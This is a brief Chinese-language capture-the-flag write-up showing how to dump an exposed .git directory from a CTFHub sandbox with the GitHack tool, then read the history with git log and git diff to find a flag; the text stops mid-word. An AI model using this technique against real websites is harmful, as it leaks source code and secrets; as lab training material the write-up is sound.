1.GIT泄露
1.1 Log
1.我们可以使用GitHack进行**.git泄露的利用**,工具下载地址:https://github.com/BugScanTeam/GitHack
2.输入命令:python GitHack-master\GitHack.py http://challenge-17166fa2b0cc5f00.sandbox.ctfhub.com:10080/.git
3.看第一步输出的结果,进入到此目录下
4.执行:git log ,可以看到add flag这次命令中
5.于是执行 git diff 2f3f5b29289f349afae994e095c5609ee8d64b2c 得到fla